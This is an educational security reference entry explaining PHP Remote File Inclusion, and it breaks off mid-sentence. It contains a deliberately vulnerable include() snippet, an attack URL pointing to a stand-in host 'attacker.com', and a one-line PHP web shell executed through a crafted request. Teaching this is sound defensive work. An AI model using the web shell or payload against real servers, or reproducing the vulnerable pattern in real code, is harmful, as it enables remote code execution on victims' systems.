Remote File Inclusion (RFI) is a vulnerability where an application includes files from remote URLs based on user input, allowing attackers to include and execute malicious code hosted on external servers.
When an application's file inclusion mechanism accepts URLs and remote file access is enabled (e.g., PHP's allow_url_include), attackers can specify a URL to their malicious script, which gets fetched and executed by the server.
// PHP - vulnerable (requires allow_url_include=On)
$page = $_GET['page'];
include($page);
// Attack: ?page=http://attacker.com/shell.txt
// The remote file gets fetched and executed as PHP# Attacker hosts malicious PHP on their server:
# http://attacker.com/shell.txt contains:
<?php system($_GET['cmd']); ?>
# Victim request:
GET /index.php?page=http://attacker.com/shell.txt&cmd=id
# The victim server fetches and executes the remote codeallow_url_fopen = On (default On)allow_url_include = On (default Off since PHP 5.2)RFI is less common today because allow_url_include is disabled by default in modern PHP. However, it still occurs in: